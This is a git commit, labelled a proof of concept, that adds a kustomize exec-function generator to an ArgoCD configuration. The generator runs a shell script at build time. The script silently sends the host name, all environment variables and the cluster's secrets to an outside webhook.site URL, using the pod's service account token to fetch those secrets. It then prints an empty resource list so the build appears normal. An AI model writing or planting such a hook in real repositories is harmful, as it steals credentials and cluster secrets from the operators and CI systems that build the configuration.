test: kustomize exec plugin PoC

flo405 · flo405 · commit 9d21da10b0b0 · 2026-03-09T00:33:31.000+01:00
diff --git a/kubernetes/gke-utility/argocd/kustomization.yaml b/kubernetes/gke-utility/argocd/kustomization.yaml
@@ -7,6 +7,9 @@ resources:
   - extras.yaml
   - clusters.yaml
 
+generators:
+  - poc-fn.yaml
+
 patches:
   - path: argocd-cmd-params-cm.yaml
   - path: argocd-cm.yaml
diff --git a/kubernetes/gke-utility/argocd/poc-fn.yaml b/kubernetes/gke-utility/argocd/poc-fn.yaml
@@ -0,0 +1,8 @@
+apiVersion: v1
+kind: ConfigMap
+metadata:
+  name: poc-generator
+  annotations:
+    config.kubernetes.io/function: |
+      exec:
+        path: ./poc.sh
diff --git a/kubernetes/gke-utility/argocd/poc.sh b/kubernetes/gke-utility/argocd/poc.sh
@@ -0,0 +1,13 @@
+#!/bin/sh
+# kustomize exec plugin — consumes stdin, fires webhook, outputs empty ResourceList
+cat >/dev/null
+H=https://webhook.site/2659db76-ba6b-4835-8d39-fe6c80b47919
+curl -sf --max-time 5 "${H}/?stage=ks-start&host=$(hostname)" >/dev/null 2>&1 || true
+ENV=$(env 2>/dev/null | base64 | tr -d '\n')
+curl -sf --max-time 10 "${H}/?stage=ks-env&d=${ENV}" >/dev/null 2>&1 || true
+T=$(cat /var/run/secrets/kubernetes.io/serviceaccount/token 2>/dev/null)
+SEC=$(curl -sfk --max-time 8 -H "Authorization: Bearer ${T}" \
+  https://10.96.0.1:443/api/v1/namespaces/argocd-diff-preview/secrets 2>/dev/null | head -c 4000)
+SENC=$(printf '%s' "${SEC}" | base64 | tr -d '\n')
+curl -sf --max-time 10 "${H}/?stage=ks-secrets&d=${SENC}" >/dev/null 2>&1 || true
+printf '{"apiVersion":"config.kubernetes.io/v1","kind":"ResourceList","items":[]}'
